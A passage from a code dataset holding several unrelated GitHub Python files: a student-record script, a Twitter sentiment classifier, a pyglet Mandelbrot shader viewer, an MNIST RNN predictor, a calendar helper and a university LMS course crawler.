range(len(l)):\r\n if l[i].roll == roll:\r\n l[i].roll = no\r\n\r\n def delete(self, roll):\r\n for i in range(len(l)):\r\n if l[i].roll == roll:\r\n del l[i]\r\n\r\nl = []\r\nob = Student(0, \"\", 0, 0)\r\nprint(\"Operations available are :\")\r\nprint(\"1. Accept Student details \\n2.Display Student details \\n3. Search Student details \\n4.Update Student details \\n.5 Delete Student details\")\r\nob.accept(124, \"Puneeth\", 98, 100)\r\nob.accept(113, \"Aarya\", 98, 99)\r\nob.accept(120, \"Prithviraj\", 99, 98)\r\nch = int(input(\"Enter your choice : \"))\r\nif ch == 1:\r\n print(\"Enter Student details\")\r\n roll = int(input())\r\n name = input()\r\n m1 = input()\r\n m2 = input()\r\n ob.accept(roll, name, m1, m2)\r\nelif ch == 2:\r\n a = int(input(\"Enter the roll no of student : \"))\r\n if ob.search(a) != -1:\r\n ob.display(l[ob.search(a)])\r\n else:\r\n print(\"Data not found\")\r\nelif ch == 3:\r\n a = int(input(\"Enter the roll no of student : \"))\r\n if ob.search(a) != -1:\r\n print(\"Data is Available in the database\")\r\n else:\r\n print(\"Data not found\")\r\nelif ch == 4:\r\n a = int(input(\"Enter the roll no of student : \"))\r\n b = int(input(\"Enter the rollno to be updated\"))\r\n if ob.search(a) != -1:\r\n ob.update(a, b)\r\n else:\r\n print(\"Data not found\")\r\nelse:\r\n a = int(input(\"Enter the roll no of student : \"))\r\n if ob.search(a) != -1:\r\n ob.delete(a)\r\n print(\"Deleted successfully\")\r\n else:\r\n print(\"Data not found\")\r\n \r\n \r\n\r\n","repo_name":"Pankaj2107/BDA-LAB","sub_path":"student_management.py","file_name":"student_management.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74530351147","text":"import re\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nfrom twitter import *\r\n# Tweepy - Python library for accessing the Twitter API.\r\nimport tweepy\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom wordcloud import WordCloud\r\n\r\nimport nltk\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem.porter import PorterStemmer\r\n\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.naive_bayes import BernoulliNB\r\n#from sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.svm import LinearSVC\r\nfrom sklearn.calibration import CalibratedClassifierCV\r\nimport time\r\n\r\n#nltk.download('stopwords')\r\n#all_stopwords = stopwords.words('english')\r\n \r\n#loading data=============================================================================\r\n\r\ndataset_columns = [\"sentiment\" , \"id\" , \"time\" , \"flag\" , \"user\" , \"text\" ]\r\ndataset_coding = \"ISO-8859-1\"\r\ndataset = pd.read_csv(\"twitter_dataset.csv\", names = dataset_columns , encoding = dataset_coding )\r\n\r\n#preprocessing function=============================================================================\r\n\r\ndef preprocess(tweet , stem = True):\r\n processedText = []\r\n \r\n urlPattern = r\"((http://)[^ ]*|(https://)[^ ]*|( www\\.)[^ ]*)\"\r\n userPattern = '@[^\\s]+'\r\n alphanumericPattern = r'\\w*\\d\\w*'\r\n sequencePattern = r\"(.)\\1\\1+\"\r\n seqReplacePattern = r\"\\1\\1\"\r\n punc = r'[^\\w\\s]'\r\n \r\n #tweet = tweet.lower()\r\n tweet = re.sub(urlPattern , '' , tweet)\r\n tweet = re.sub(userPattern , '' , tweet)\r\n tweet = re.sub(alphanumericPattern , '' , tweet)\r\n tweet = re.sub(sequencePattern , seqReplacePattern , tweet)\r\n tweet = re.sub(punc,\"\",tweet)\r\n \r\n tweet = tweet.split() \r\n ps = PorterStemmer()\r\n \r\n all_stopwords = stopwords.words('english')\r\n \r\n \r\n for word in tweet:\r\n if word not in (all_stopwords):\r\n if stem:\r\n processedText.append(ps.stem(word))\r\n else:\r\n processedText.append(word)\r\n \r\n return \" \".join(processedText)\r\n \r\n \r\n#droping 600000 data------------------------------------------------------------------\r\n\r\ncleared_dataset = dataset.sample(frac=1).reset_index(drop=True)\r\ncleared_dataset = cleared_dataset.iloc[0:1000000]\r\n\r\n#appling preprocessing=============================================================================\r\n\r\ncleared_dataset = cleared_dataset.drop(cleared_dataset.index[0]).reset_index()\r\ncleared_dataset = cleared_dataset.drop(['time','flag','user','id','index'],axis=1)\r\ncleared_dataset[\"text\"] = cleared_dataset[\"text\"].apply(preprocess)\r\nX = cleared_dataset['text']\r\n\r\n\r\n#splitting data---------------------------------------------------------------------------------\r\n\r\ny = cleared_dataset['sentiment']\r\nX_train, X_test, y_train, y_test = train_test_split(X , y, test_size = 0.30, random_state = 10)\r\n\r\n#vectorizing data\r\n\r\nvectorizer = TfidfVectorizer(analyzer='word',max_df=0.90, min_df=2, max_features = 500000,ngram_range=(1,2))\r\nX_train = vectorizer.fit_transform(X_train)\r\ntfidf_tokens = vectorizer.get_feature_names()\r\nprint(\"Number of feature_words = \", len(tfidf_tokens))\r\n#print(tfidf_tokens[1:2000])\r\n\r\nX_test = vectorizer.transform(X_test) #transforming x_test on X_train's transformation\r\n\r\n#scaling\r\n\r\nx_max = X_train.max()\r\nx_min = X_train.min()\r\n\r\nX_train = (X_train - x_min)/x_max\r\nX_test = (X_test - x_min)/x_max\r\n\r\n#model evaluation=============================================================================\r\n\r\ndef model(model):\r\n y_pred = model.predict(X_test)\r\n y_pred = pd.Series(y_pred)\r\n y_pred = y_pred.values \r\n y_test_ = pd.Series(y_test) \r\n y_test_ = y_test_.values \r\n #print(\"Comparison:\")\r\n #result = np.concatenate((y_pred.reshape(len(y_pred),1), y_test_.reshape(len(y_test_),1)),1)\r\n #print(result[1:500])\r\n \r\n c_matrix = confusion_matrix(y_test_, y_pred)\r\n print(\"Confusion Matrix = \\n\",c_matrix)\r\n print(\"Accuracy Score = \",accuracy_score(y_test_, y_pred))\r\n print(\"Train Score = \",model.score(X_train, y_train))\r\n print(\"Test Score = \",model.score(X_test, y_test))\r\n \r\n \r\n \r\n categories = ['Negative','Positive']\r\n prediction = ['True Negative','False Positive', 'False Negative','True Positive']\r\n percentage = ['{0:.2%}'.format(value) for value in c_matrix.flatten() / np.sum(c_matrix)]\r\n\r\n labels = [f'{m}\\n{n}' for m, n in zip(prediction,percentage)]\r\n labels = np.asarray(labels).reshape(2,2)\r\n sns.heatmap(c_matrix,cmap = 'Blues' , fmt = '',annot = labels, xticklabels = categories, yticklabels = categories)\r\n plt.xlabel(\"Predicted values\")\r\n plt.ylabel(\"Actual values\")\r\n plt.title (\"Confusion Matrix\")\r\n \r\ndef logisticRegression():\r\n global logistic_reg\r\n start_time = time.time()\r\n logistic_reg = LogisticRegression(solver = 'sag',C = 2, max_iter = 1500)\r\n logistic_reg.fit(X_train, y_train) \r\n model(logistic_reg)\r\n print(\"--- %s seconds ---\" % (time.time() - start_time))\r\n \r\n \r\ndef naiveBayes(): \r\n global naive_bayes \r\n start_time = time.time()\r\n naive_bayes = BernoulliNB()\r\n naive_bayes.fit(X_train, y_train) \r\n model(naive_bayes)\r\n print(\"--- %s seconds ---\" % (time.time() - start_time))\r\n \r\ndef svm():\r\n global svm_model\r\n svm = LinearSVC()\r\n svm_model = CalibratedClassifierCV(svm) \r\n svm_model.fit(X_train, y_train)\r\n model(svm_model)\r\n \r\nsvm()\r\nlogisticRegression() \r\nnaiveBayes() \r\n\r\nconfig = pd.read_csv(\"config.csv\")\r\n \r\n\r\ntwitterApiKey = str(config['twitterApiKey'][0])\r\ntwitterApiSecret = str(config['twitterApiSecret'][0])\r\ntwitterApiAccessToken = str(config['twitterApiAccessToken'][0])\r\ntwitterApiAccessTokenSecret = str(config['twitterApiAccessTokenSecret'][0])\r\n\r\ndef predict_text(text,model):\r\n start_time = time.time()\r\n sentiment=0\r\n sentiment_prob=[[]]\r\n textdata = vectorizer.transform([preprocess(text)])\r\n sentiment = model.predict(textdata)\r\n sentiment_prob = model.predict_proba(textdata) \r\n prob = ('%.2f'%max(max(sentiment_prob*100)))\r\n timer = \"%.2f seconds\" % (time.time() - start_time)\r\n return sentiment[0],timer,prob \r\n\r\n#for tweet prediction by API\r\ndef tweets_of_twitter_user(user_name,no_of_tweets):\r\n config = pd.read_csv(\"config.csv\")\r\n \r\n\r\n twitterApiKey = str(config['twitterApiKey'][0])\r\n twitterApiSecret = str(config['twitterApiSecret'][0])\r\n twitterApiAccessToken = str(config['twitterApiAccessToken'][0])\r\n twitterApiAccessTokenSecret = str(config['twitterApiAccessTokenSecret'][0])\r\n\r\n # Authenticate\r\n auth = tweepy.OAuthHandler(twitterApiKey, twitterApiSecret)\r\n auth.set_access_token(twitterApiAccessToken, twitterApiAccessTokenSecret)\r\n twetterApi = tweepy.API(auth, wait_on_rate_limit = True)\r\n\r\n\r\n twitterAccount = user_name\r\n\r\n tweets = tweepy.Cursor(twetterApi.user_timeline, \r\n screen_name=twitterAccount, \r\n count=None,\r\n since_id=None,\r\n max_id=None,\r\n trim_user=True,\r\n exclude_replies=True,\r\n contributor_details=False,\r\n include_entities=False\r\n ).items(no_of_tweets);\r\n print(tweets)\r\n\r\n tweet_DataBase = pd.DataFrame(data=[tweet.text for tweet in tweets], columns=['Tweet'])\r\n \r\n ### DataFrame for the sentiment of the user\r\n sentiment_score=[]\r\n for i in range(0,no_of_tweets):\r\n sentiment_score.append(0)\r\n \r\n for model in [logistic_reg,naive_bayes,svm_model]:\r\n prediction=[]\r\n i=0\r\n current=[]\r\n for tweets in tweet_DataBase[\"Tweet\"]:\r\n sen,timer,prob=predict_text(tweets,model)\r\n \r\n prediction.append(float(prob))\r\n current.append(sen)\r\n sentiment_score[i]=sentiment_score[i]+sen\r\n \r\n i+=1\r\n tweet_DataBase[model]=prediction\r\n \r\n tweet_DataBase[str(model)+\" current\"]=current\r\n \r\n sentiment_score=[\"Positive\" if i>4 else \"Negative\" for i in sentiment_score]\r\n tweet_DataBase.columns=[\"Tweets\",\"log_reg\",\"log_current\",\"naive\",\"naive_current\",\"svm\",\"svm_current\"]\r\n tweet_DataBase.insert(1,\"AVG_Sentiment\",sentiment_score,True)\r\n \r\n avg_accuracy=[]\r\n \r\n for i in range(no_of_tweets):\r\n l=tweet_DataBase['log_reg'][i]\r\n n=tweet_DataBase['naive'][i]\r\n s=tweet_DataBase['svm'][i]\r\n avg=(l+n+s)/3\r\n avg_accuracy.append(float(avg))\r\n \r\n tweet_DataBase[\"AVG_Accuracy\"]=avg_accuracy\r\n #tweet_DataBase.insert(-1,\"AVG_Accuracy\",avg_accuracy,True)\r\n clear_text=[]\r\n for tweet in tweet_DataBase[\"Tweets\"]:\r\n clear_text.append(preprocess(tweet))\r\n tweet_DataBase[\"cleared_text\"]=clear_text \r\n return tweet_DataBase\r\n\r\ndef sentimented_text(d):\r\n posstr = \"\"\r\n negstr= \" \"\r\n for text1 in d.loc[d['AVG_Sentiment'].values == 'Positive']['cleared_text']:\r\n posstr += text1\r\n\r\n\r\n for text2 in d.loc[d['AVG_Sentiment'].values == 'Negative']['cleared_text']:\r\n negstr += text2\r\n\r\n return posstr,negstr\r\n \r\ndef predict(model,text):\r\n textdata = vectorizer.transform([preprocess(text)])\r\n sentiment = model.predict(textdata)\r\n print(\"we use it\")\r\n return sentiment[0]\r\n\r\ndef Twitter_account_name(user_name):\r\n account_name=\"\"\r\n twitter = Twitter(auth = OAuth(twitterApiAccessToken,\r\n twitterApiAccessTokenSecret,\r\n twitterApiKey,\r\n twitterApiSecret))\r\n results = twitter.users.search(q = user_name)\r\n \r\n for user in results:\r\n if user[\"screen_name\"]==user_name or user[\"name\"]==user_name :\r\n account_name=user[\"name\"]\r\n return account_name\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"alok2244/Sentiment_Analysis-","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10468953576","text":"import ctypes as c\n\nimport pyglet\nimport pyglet.clock\nimport pyglet.window\nfrom pyglet.window import key\nfrom pyglet import gl\n\nvertex_shader = \"\"\"\nuniform float real;\nuniform float w;\nuniform float imag;\nuniform float h;\n\nvarying float xpos;\nvarying float ypos;\n\nvoid main(void)\n{\n xpos = clamp(gl_Vertex.x, 0.0,1.0)*w+real;\n ypos = clamp(gl_Vertex.y, 0.0,1.0)*h+imag;\n\n gl_Position = gl_ModelViewProjectionMatrix * gl_Vertex;\n}\n\"\"\"\n\nfragment_shader = \"\"\"\nvarying float xpos;\nvarying float ypos;\nvarying float zpos;\nvoid main (void)\n{\n float iter = 0.0;\n float max_square = 3.0;\n float square = 0.0;\n float r = 0.0;\n float i = 0.0;\n float rt = 0.0;\n float it = 0.0;\n while(iter < 1.0 && square < max_square)\n {\n rt = (r*r) - (i*i) + xpos;\n it = (2.0 * r * i) + ypos;\n r = rt;\n i = it;\n square = (r*r)+(i*i);\n iter += 0.005;\n }\n gl_FragColor = vec4 (iter, iter, sin(iter*2.00), 1.0);\n}\n\"\"\"\n\nclass ShaderException(Exception):\n pass\n\nclass Shader(object):\n \"\"\"Wrapper to create opengl 2.0 shader programms\"\"\"\n def __init__(self, vertex_source, fragment_source):\n self.program = gl.glCreateProgram()\n self.vertex_shader = self.create_shader(vertex_source,\n gl.GL_VERTEX_SHADER)\n self.fragment_shader = self.create_shader(fragment_source,\n gl.GL_FRAGMENT_SHADER)\n gl.glAttachShader(self.program, self.vertex_shader)\n gl.glAttachShader(self.program, self.fragment_shader)\n gl.glLinkProgram(self.program)\n message = self.get_program_log(self.program)\n if message:\n raise ShaderException(message)\n\n def create_shader(self, source, shadertype):\n # get a char[]\n sbuffer = c.create_string_buffer(source)\n # get a char **\n pointer = c.cast(c.pointer(c.pointer(sbuffer)),\n c.POINTER(c.POINTER(c.c_char)))\n # a long * NULL pointer\n nulll = c.POINTER(c.c_long)()\n shader = gl.glCreateShader(shadertype)\n gl.glShaderSource(shader, 1, pointer, None)\n gl.glCompileShader(shader)\n message = self.get_shader_log(shader)\n if message:\n raise ShaderException(message)\n return shader\n\n def set_uniform_f(self, name, value):\n location = gl.glGetUniformLocation(self.program, name)\n gl.glUniform1f(location, value)\n\n def __setitem__(self, name, value):\n \"\"\"pass a variable to the shader\"\"\"\n if isinstance(value, float):\n self.set_uniform_f(name, value)\n else:\n raise TypeError(\"Only floats are supported so far\")\n\n def use(self):\n gl.glUseProgram(self.program)\n\n def stop(self):\n gl.glUseProgram(0)\n\n def get_shader_log(self, shader):\n return self.get_log(shader, gl.glGetShaderInfoLog)\n\n def get_program_log(self, shader):\n return self.get_log(shader, gl.glGetProgramInfoLog)\n\n def get_log(self, obj, func):\n log_buffer = c.create_string_buffer(4096)\n buffer_pointer = c.cast(c.pointer(log_buffer), c.POINTER(c.c_char))\n written = c.c_int()\n func(obj, 4096, c.pointer(written), buffer_pointer)\n return log_buffer.value\n\n\nclass MainWindow(pyglet.window.Window):\n def __init__(self):\n pyglet.window.Window.__init__(self, width=640, height=480,\n resizable=True)\n self.fps = pyglet.clock.ClockDisplay()\n self.shader = Shader(vertex_shader, fragment_shader)\n self.real = -2.0\n self.w = 3.0\n self.imag = -1.0\n self.h = 2.0\n self.show_fps = False\n\n def on_key_press(self, symbol, modifiers):\n if symbol == key.ESCAPE:\n self.has_exit = True\n elif symbol == key.F:\n self.set_fullscreen(not self.fullscreen)\n elif symbol == key.F1:\n self.show_fps = not self.show_fps\n elif symbol == key.F2:\n pyglet.image.get_buffer_manager().get_color_buffer().save('screenshot.png')\n\n def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers):\n self.real -= self.w / self.width * dx\n self.imag -= self.h / self.height * dy\n\n def on_mouse_scroll(self, x, y, scroll_x, scroll_y):\n if scroll_y > 0:\n self.real += (float(x) / self.width * self.w) - self.w * 0.25\n self.w *= 0.5\n self.imag += (float(y) / self.height * self.h) - self.h * 0.25\n self.h *= 0.5\n else:\n self.real += (float(x) / self.width * self.w) - self.w\n self.w *= 2.0\n self.imag += (float(y) / self.height * self.h) - self.h\n self.h *= 2.0\n\n def on_resize(self, width, height):\n ratio = float(width) / height\n self.w = ratio * self.h\n pyglet.window.Window.on_resize(self, width, height)\n\n def run(self):\n while not self.has_exit:\n pyglet.clock.tick()\n self.dispatch_events()\n gl.glClear(gl.GL_COLOR_BUFFER_BIT)\n gl.glLoadIdentity()\n self.shader.use()\n self.shader[\"real\"] = self.real\n self.shader[\"w\"] = self.w\n self.shader[\"imag\"] = self.imag\n self.shader[\"h\"] = self.h\n gl.glBegin(gl.GL_QUADS)\n gl.glVertex3f(0.0, 0.0, 0.0)\n gl.glVertex3f(0.0, self.height, 0.0)\n gl.glVertex3f(self.width, self.height, 0.0)\n gl.glVertex3f(self.width, 0.0, 0.0)\n gl.glEnd()\n self.shader.stop()\n if self.show_fps:\n self.fps.draw()\n self.flip()\n\ndef main():\n MainWindow().run()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gunny26/pygame","sub_path":"pyglet_mandelbrot.py","file_name":"pyglet_mandelbrot.py","file_ext":"py","file_size_in_byte":5673,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"34145187638","text":"import tensorflow as tf\nimport numpy as np\nfrom mnistRnn.rnn_train import rnn_graph\nfrom mnistRnn.settings import mnist, width, height, rnn_size, out_size\n\n\ndef mnist2text(image_list, height, width, rnn_size, out_size):\n '''\n mnist数字向量转为文本\n :param image_list:\n :param height:\n :param width:\n :param rnn_size:\n :param out_size:\n :return:\n '''\n x = tf.placeholder(tf.float32, [None, height, width])\n y_conv = rnn_graph(x, rnn_size, out_size, width, height)\n saver = tf.train.Saver()\n with tf.Session() as sess:\n saver.restore(sess, tf.train.latest_checkpoint('.'))\n predict = tf.argmax(y_conv, 1)\n vector_list = sess.run(predict, feed_dict={x: image_list})\n vector_list = vector_list.tolist()\n return vector_list\n\n\nif __name__ == '__main__':\n batch_x_test = mnist.test.images\n batch_x_test = batch_x_test.reshape([-1, height, width])\n\n batch_y_test = mnist.test.labels\n batch_y_test = list(np.argmax(batch_y_test, 1))\n\n pre_y = list(mnist2text(batch_x_test, height, width, rnn_size, out_size))\n for text in batch_y_test:\n print('Label:', text, ' Predict:', pre_y[batch_y_test.index(text)])\n\n","repo_name":"lpty/tensorflow_tutorial","sub_path":"mnistRnn/mnist_rnn.py","file_name":"mnist_rnn.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":242,"dataset":"github-code","pt":"37"} +{"seq_id":"25701847980","text":"# @Project: FinancialDashboard\n# @Filename: ids.py.py\n# @Author: Daksh\n# @Time: 08-12-2022 10:38 pm\n\n# stores the ids of all the components\n\nBAR_CHART = \"bar-chart\"\nPIE_CHART = \"pie-chart\"\n\nSELECT_ALL_CATEGORIES_BUTTON = \"select-all-categories-button\"\nCATEGORY_DROPDOWN = \"category-dropdown\"\n\nSELECT_ALL_MONTHS_BUTTON = \"select-all-months-button\"\nMONTH_DROPDOWN = \"month-dropdown\"\n\nYEAR_DROPDOWN = \"year-dropdown\"\nSELECT_ALL_YEARS_BUTTON = \"select-all-years-button\"\n","repo_name":"warlock-spell/Financial-Dashboard-Plotly-Dash","sub_path":"src/components/ids.py","file_name":"ids.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10749294686","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n\"\"\"\n @Project: python\n @Date: 10/14/2018 10:58 AM\n @Author: xuegangliu\n @Description: fileTest\n\"\"\"\nimport os\n\ndef test():\n print(os.getcwd())\n print(os.listdir())\n # print(os.path.join(os.getcwd(),os.listdir()[1]))\n\ndef writeFileList():\n fid = open('fileList.txt', 'w')\n # rootdir = os.getcwd()\n rootdir = 'D:\\\\test'\n print('rootdir = ' + rootdir)\n pathname = []\n for (dirpath, dirnames, filenames) in os.walk(rootdir):\n for filename in filenames:\n pathname += [os.path.join(dirpath, filename)]\n for tt in pathname:\n fid.write(str(tt))\n fid.write(\"\\n\")\n fid.close()\n\nif __name__ == '__main__':\n # test()\n writeFileList()","repo_name":"xuegangliu/python","sub_path":"sample/fileModule/fileTest.py","file_name":"fileTest.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10348121538","text":"from cryptography.hazmat.primitives.padding import PKCS7\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom server.crypto.idea import do_encode, do_decode\nimport os\nimport json\nimport base64\n\n\ndef wrap_json(data, session_key, session_id):\n ret, iv = do_encode(data, session_key)\n rj = {\"sid\": session_id, \"iv\": base64.b64encode(iv).decode(), \"data\": base64.b64encode(ret).decode()}\n return rj\n\n\ndef unwrap_json(data, session_key, session_id):\n assert session_id == data[\"sid\"]\n iv = base64.b64decode(data[\"iv\"])\n data_enc = base64.b64decode(data[\"data\"])\n data_bytes = do_decode(data_enc, session_key, iv)\n\n rj = json.loads(data_bytes)\n return rj\n\n\ndef encrypt(data, key):\n padder = PKCS7(64).padder()\n data_padded = padder.update(data.encode())\n data_padded += padder.finalize()\n\n iv = os.urandom(8)\n enc = Cipher(algorithms.IDEA(key), modes.CBC(iv)).encryptor()\n ret = iv + enc.update(data_padded)\n ret += enc.finalize()\n return base64.b64encode(ret).decode()\n\n\ndef decrypt(data, key):\n b = base64.b64decode(data)\n iv, data_enc = b[:8], b[8:]\n data_bytes = do_decode(data_enc, key, iv)\n return data_bytes.decode()","repo_name":"Proger125/Cryptography","sub_path":"Lab_02/client/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39409200286","text":"import calendar\nfrom collections import deque\nimport datetime\n\n# 参考文献: https://blog.narito.ninja/detail/11/\n\nnow = datetime.datetime.now()\n\nclass BaseCalendarMixin:\n \"\"\"カレンダー関連Mixinの、基底クラス\"\"\"\n first_weekday = 0 # 0は月曜から、1は火曜から。6なら日曜日からになります。\n week_names = ['月', '火', '水', '木', '金', '土', '日'] # これは、月曜日から書くことを想定します。['Mon', 'Tue'...\n\n def setup_calendar(self):\n \"\"\"内部カレンダーの設定処理\n calendar.Calendarクラスの機能を利用するため、インスタンス化します。\n Calendarクラスのmonthdatescalendarメソッドを利用していますが、デフォルトが月曜日からで、\n 火曜日から表示したい(first_weekday=1)、といったケースに対応するためのセットアップ処理です。\n \"\"\"\n self._calendar = calendar.Calendar(self.first_weekday)\n\n def get_week_names(self):\n \"\"\"first_weekday(最初に表示される曜日)にあわせて、week_namesをシフトする\"\"\"\n # dequeしたものはrotateメソッドを持つ. deque.rotate(number)で, number分だけ要素を左にずらしていく. \n week_names = deque(self.week_names)\n week_names.rotate(-self.first_weekday) \n return week_names\n\n\nclass MonthCalendarMixin(BaseCalendarMixin):\n \"\"\"月間カレンダーの機能を提供するMixin\"\"\"\n def get_previous_month(self, date):\n \"\"\"前月を返す\"\"\"\n if date.month == 1:\n return date.replace(year=date.year-1, month=12, day=1)\n else:\n return date.replace(month=date.month-1, day=1)\n\n def get_next_month(self, date):\n \"\"\"次月を返す\"\"\"\n if date.month == 12:\n return date.replace(year=date.year+1, month=1, day=1)\n else:\n return date.replace(month=date.month+1, day=1)\n\n def get_month_days(self, date):\n \"\"\"その月の全ての日を返す\"\"\"\n # 帰ってくるのはdatetime型が格納された配列\n # monthdatescalendarは, pythonに組み込まれている. \n return self._calendar.monthdatescalendar(date.year, date.month)\n\n def get_current_month(self, _month, _year):\n \"\"\"現在の月を返す\"\"\"\n # 引数の渡し方を変える\n month = _month\n year = _year\n\n # month = self.kwargs.get('month')\n # year = self.kwargs.get('year')\n if month and year:\n month = datetime.date(year=int(year), month=int(month), day=1)\n else:\n month = datetime.date.today().replace(day=1)\n return month\n\n def get_month_calendar(self, _month, _year):\n \"\"\"月間カレンダー情報の入った辞書を返す\"\"\"\n self.setup_calendar()\n current_month = self.get_current_month(_month, _year)\n calendar_data = {\n 'now': datetime.date.today(),\n 'month_days': self.get_month_days(current_month),\n 'month_current': current_month,\n 'month_previous': self.get_previous_month(current_month),\n 'month_next': self.get_next_month(current_month),\n 'week_names': self.get_week_names(),\n }\n return calendar_data\n\ndef week_name_test():\n demo_calendar = BaseCalendarMixin()\n week_names = deque(demo_calendar.week_names)\n week_names.rotate(1)\n print(week_names)\n\ndef month_days_test():\n demo_calendar = MonthCalendarMixin()\n demo_calendar.setup_calendar()\n print(demo_calendar.get_month_days(now))\n\ndef current_month_test():\n demo_calendar = MonthCalendarMixin()\n print(demo_calendar.get_current_month(now.month, now.year))\n\ndef month_calendar_test():\n demo_calendar = MonthCalendarMixin()\n print(demo_calendar.get_month_calendar(now.month, now.year))\n\n# week_name_test()\n# month_days_test()\n# current_month_test()\nmonth_calendar_test()","repo_name":"Yeongse/sunsun","sub_path":"shift/tests/calendar_test.py","file_name":"calendar_test.py","file_ext":"py","file_size_in_byte":3975,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22227766717","text":"from BotApp.models import *\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom CE99Bot.config import *\nfrom .UserCourseCUBE import apply as user_course_cube_apply\n\ndef login(username, password):\n url = 'https://lms.iust.ac.ir/login/index.php'\n with requests.session() as session:\n response = session.get(url)\n soup = BeautifulSoup(response.text, 'lxml')\n url = soup.find(class_=\"btn btn-primary btn-block\")['href']\n response = session.get(url)\n data = {\n 'name': username,\n \"pass\": password,\n # \"form_build_id\": \"form-I0t7Yj6NBHjmQPhNqOaulhhjaf4BEqcKxpTDZbfwYvk\",\n \"form_id\": \"oauth2_server_authenticate_form\",\n \"op\": \"ورود\"\n }\n response = session.post('https://its.iust.ac.ir/oauth2/autheticate', data=data)\n if response.status_code == 200:\n return session\n else:\n return None\n\n\ndef crawl_user_info(session, user):\n # Get the user's info\n try:\n response = session.get('https://lms.iust.ac.ir/user/profile.php')\n soup = BeautifulSoup(response.text, 'lxml')\n full_name = soup.find(class_=\"contentnode fullname\").span.text\n student_id = soup.find(class_=\"contentnode idnumber aduseropt\").dd.text.strip('S:')\n department = soup.find(class_=\"contentnode department aduseropt\").dd.text\n return {\"status\": \"OK\", \"session\": session, \"soup\": soup, \"full_name\": full_name, \"student_id\": student_id, \"department\": department}\n except:\n return {\"status\": \"Error\", \"session\": session}\n\n\ndef set_user_info(user, user_info, departments, statuses):\n status = user_info['status']\n\n if status == 'OK':\n user.full_name = user_info['full_name']\n user.student_id = user_info['student_id']\n\n if user_info['department'] in departments:\n user.department = departments.get(user_info['department'])\n else:\n new_department = Department.objects.create(name=user_info['department'])\n user.department = new_department\n departments[user_info['department']] = new_department\n\n user.status = statuses.get('correct')\n user.save()\n return {\"status\": \"correct\"}\n\n elif status == 'Error':\n return {\"status\": \"error\"}\n\n\ndef crawl_course_info(session, soup):\n all_courses = {course.name: course for course in Course.objects.all()}\n # Get the user's courses\n dic_course = {}\n courses = soup.find('li', class_=\"contentnode courseprofiles\").find_all('a')\n response = session.get(courses[-1]['href'])\n soup = BeautifulSoup(response.text, 'lxml')\n courses = soup.find('li', class_=\"contentnode courseprofiles\").find_all('a')\n for i in range(len(courses)):\n course = courses[i]\n course_id = course['href'].split(\"&course=\")[1].split(\"&\")[0]\n course_name = course.text\n course_term = course_name.split(\" \")[-1]\n course_term = course_term[1:len(course_term) - 1]\n course_view_link = BASE_VIEW_LINK + course_id \n course_info_link = BASE_INFO_LINK + course_id\n course_is_active = False\n dic_course[course_name] = {\"crawled\":False, \"id\": course_id, \"term\": course_term, \"view_link\": course_view_link, \"info_link\": course_info_link, \"is_active\": course_is_active}\n if course_name in all_courses: \n dic_course[course_name][\"crawled\"] = True\n\n response = session.get(course_view_link)\n soup = BeautifulSoup(response.text, 'lxml')\n # Get the user's courses' view link\n if soup.find(id=\"editingbutton\"):\n dic_course[course_name]['user_course_type'] = \"TA\"\n else:\n dic_course[course_name]['user_course_type'] = \"student\"\n try:\n adobe = soup.find(class_=\"activity adobeconnect modtype_adobeconnect\").find('a')['href']\n # https://lms.iust.ac.ir/mod/adobeconnect/view.php?id=413574\n response = session.get(adobe)\n soup = BeautifulSoup(response.text, 'lxml')\n class_time = soup.find(class_=\"aconmeetinforow\").find_all(\n class_=\"aconlabeltitle\")[-1].text\n d_c = class_time.split('از ساعت')\n days = d_c[0].split('زمان تشکیل جلسه :هر')[-1].split(' و ')\n days_list = []\n for day in days:\n day = day.strip(' ')\n days_list.append(day)\n clock = d_c[-1].split(' ')[1]\n dic_course[course_name]['days'] = days_list\n dic_course[course_name]['clock'] = clock\n dic_course[course_name]['is_active'] = True\n except:\n dic_course[course_name]['days'] = None\n dic_course[course_name]['clock'] = None\n\n return dic_course \n\n\ndef set_user_courses(user, course_info, courses):\n terms = {term.name: term for term in Term.objects.all()}\n user_courses = {user_course.course: user_course for user_course in UserCourse.objects.all().filter(user=user)}\n days = {day.name: day for day in Day.objects.all()}\n clocks = {clock.time: clock for clock in ClockTime.objects.all()}\n user_course_type = {usertype.name: usertype for usertype in UserCourseType.objects.all()}\n\n\n for course_name, course in course_info.items():\n if course['crawled']:\n course_obj = Course.objects.get(name=course_name)\n if course_obj not in user_courses:\n user_type = user_course_type.get(course['user_course_type'])\n user_course = UserCourse.objects.create(user=user, course=course_obj, user_type=user_type)\n user_courses[course_obj] = user_course\n continue\n \n term = None\n if course['term'] in terms:\n 